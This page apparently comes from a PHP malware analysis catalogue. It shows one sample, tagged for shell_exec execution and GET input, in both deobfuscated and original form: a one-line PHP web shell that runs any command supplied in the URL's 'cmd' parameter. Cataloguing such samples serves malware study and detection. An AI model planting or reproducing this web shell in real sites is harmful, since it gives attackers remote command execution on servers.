Toggle navigation
Beneri
Hash Game
Real Sec
Malware Analysis
About
PHP Malware Analysis
Back to list
Tags
Execution
shell_exec
Input
_GET
Deobfuscated code
<?php echo shell_exec($_GET['cmd']);
Original code
<?php echo shell_exec($_GET['cmd']);